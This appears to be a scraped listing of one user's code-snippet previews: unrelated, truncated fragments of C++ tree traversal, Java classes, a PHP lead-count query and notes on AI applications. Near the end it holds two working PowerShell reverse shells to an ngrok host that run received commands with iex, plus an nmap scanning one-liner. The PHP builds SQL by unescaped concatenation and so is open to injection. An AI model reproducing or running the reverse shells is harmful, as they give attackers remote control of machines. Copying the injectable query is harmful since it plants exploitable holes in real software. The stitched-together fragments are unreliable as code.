https://www.youtube.com/watch?v=JMUxmLyrhSk
- google reccomendation
- analyze legal documents J.P Morgan
- IBM Watson medical technology
- self driving
- tweet emotional recognition
- ...
| template < typename F> | |
| void visitaPerLivelli(BinaryTree<F>* t){ | |
| codePointer<F> C; | |
| C.incoda(t->key()); | |
| while(!C.codavuota()){ | |
| F nodo = C.leggicoda(); | |
| C.fuoricoda(); | |
| BinaryTree<F>* nodoAlbero = t->lookupNode(nodo); | |
| cout << nodoAlbero->key() << "\n"; |
| class Course | |
| { | |
| String subject1; | |
| String subject2; | |
| String subject3; | |
| public Course(String sub1, String sub2, String sub3) | |
| { |
| class Course implements Cloneable | |
| { | |
| String subject1; | |
| String subject2; | |
| String subject3; | |
| public Course(String sub1, String sub2, String sub3) | |
| { |
| class SimpleThreadEx extends Thread { | |
| private static int ThreadCounter = 0; | |
| private int seriesCounter = 0; | |
| private int lastNumber; | |
| private int ThreadId; | |
| public SimpleThreadEx(int value){ | |
| ThreadId = ThreadCounter ++; |
| class SimpleThreadExRun implements Runnable { | |
| private static int ThreadCounter = 0; | |
| private int seriesCounter = 0; | |
| private int lastNumber; | |
| private int ThreadId; | |
| public SimpleThreadExRun(int value){ | |
| ThreadId = ThreadCounter ++; | |
| seriesCounter = value; |
| <?php | |
| function getCountByField($year,$field,$interessato_a = ''){ | |
| $acceptable = ["citta","provincia" ,"source_potential" ,"campagna" ]; | |
| if(in_array($acceptable,strtolower($field))){ | |
| $whereClause = ($interessato_a == '') ? '' : " and interessato_a = ".$interessato_a; | |
| return GQD('fl_leads_hrc',$field.", count(*) as cnt ","year(data_creazione) = ".$year." ".$whereClause." GROUP BY ".$field); | |
| }else{ | |
| return null; | |
| } | |
| } |
https://www.youtube.com/watch?v=JMUxmLyrhSk
| $socket = new-object System.Net.Sockets.TcpClient('0.tcp.ngrok.io', 11349); | |
| if($socket -eq $null){exit 1} | |
| $stream = $socket.GetStream(); | |
| $writer = new-object System.IO.StreamWriter($stream); | |
| $buffer = new-object System.Byte[] 1024; | |
| $encoding = new-object System.Text.AsciiEncoding; | |
| do | |
| { | |
| $writer.Flush(); | |
| $read = $null; |
| $client = New-Object System.Net.Sockets.TCPClient("0.tcp.ngrok.io",11251);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
ports=$(nmap -p- --min-rate=1000 -T4 ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports ip